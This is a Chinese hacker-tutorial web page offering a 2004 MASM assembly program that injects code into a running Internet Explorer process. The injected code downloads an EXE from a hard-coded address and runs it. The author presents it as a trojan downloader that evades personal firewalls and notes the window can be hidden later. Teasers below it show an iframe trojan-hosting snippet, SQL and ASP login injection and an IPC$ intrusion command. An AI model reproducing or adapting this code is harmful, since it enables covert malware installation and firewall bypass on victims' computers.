教你注入下载文件的代码到IE进程然后下载的文件

所属分类: 网络安全 / 黑客教程 阅读数: 116
收藏 0 赞 0 分享
大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # Injection downloadcode in IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on win2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc
.data
hello db ’2K下建远程线程’,0
tit db ’IEFrame’,0
szFormat db ’PID是:%d’,0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db ’c:\a.EXE’,0 .const
szmsg db ’URLDownloadToFileA’,0
userdll db ’Urlmon.dll’,0
;szmsg db ’MessageBoxA’,0
;userdll db ’User32.dll’,0
szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟
kerdll db ’kernel32.dll’,0 .code
codebegin:
dispdata db "http://192.168.0.5/NBTreeList.exe",0
szTit db "c:\a.exe",0
datalen =$-codebegin
Rproc proc msgbox ;MessageBoxA的地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX dispdata]
LEA EDX,[EBX szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebegin ;代码长度xx字节 start:
;invoke FindWindow,0,offset tit ;返回计算器窗口句柄
invoke FindWindow,offset tit,0
invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号
;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄
invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL mov esi,pCodeRemote
add esi,datalen
push esi
invoke LoadLibrary,offset userdll
invoke GetProcAddress,eax,offset szmsg
pop esi
invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0 mov hThread,eax ; 返回线程句柄
.if hThread
invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束
invoke CloseHandle,hThread ;关闭线程句柄
.endif invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
invoke CloseHandle,hProcess ;关闭进程句柄
invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1
invoke ExitProcess,0
end start
更多精彩内容其他人还在看

汗颜:黑客居然这样保护自己的电脑

     看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢?   就像你说的那样,我也中过木马,也同样被黑过,我的经验
收藏 0 赞 0 分享

高手支招:通过进程抓马

 对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。   实例一:和进程的“表
收藏 0 赞 0 分享

ASP注入万能登陆密码

《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:   程序代码   <%   username=trim(Request.Form("username"))   password=trim(Reque
收藏 0 赞 0 分享

容易被黑客攻击的10个漏洞

  应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散,但它们也同样会造成很多问题,从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事,而不幸的是对应用程序的攻击是非常容易的
收藏 0 赞 0 分享

139入侵简易教程

  net use\192.168.0.1ipc$Content$nbsp;"" /user:administrator   提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。   首先,连接的命令
收藏 0 赞 0 分享

有史以来最牛的服务器反黑全集

 Win2k的缺省安装很容易被攻击者取得帐号列表,即使安装了最新的Service ack也是如此。   方案一   1.打补丁   微软的作风就是三天一小补,五天一大补,漏洞太多,补一点就好一点,使用“开始-WindowsUpdate"然后把所有
收藏 0 赞 0 分享

网页挂马方法和技巧大汇总

1,挂马的N种方法   (1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>
收藏 0 赞 0 分享

黑客快速入门

今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,   包括它的类型,用户列表,目录,端口,漏洞等等。   首先我们我们要找一台主机来练手,随便挑吧!www.dddd.com(乱说的)第一部,呵呵,   先在ie里看看吧,mmmm.....做的还行,挺精致的!主
收藏 0 赞 0 分享

秒杀Google浏览器

用Google浏览器浏览此篇文章,并点击下面的字符:   EVIL:%   是不是很爽,^_^。
收藏 0 赞 0 分享

犀利的 oracle 注入技术

犀利的 oracle 注入技术   原文发表在黑客手册   linx 2008.1.12   介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。   以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS
收藏 0 赞 0 分享
查看更多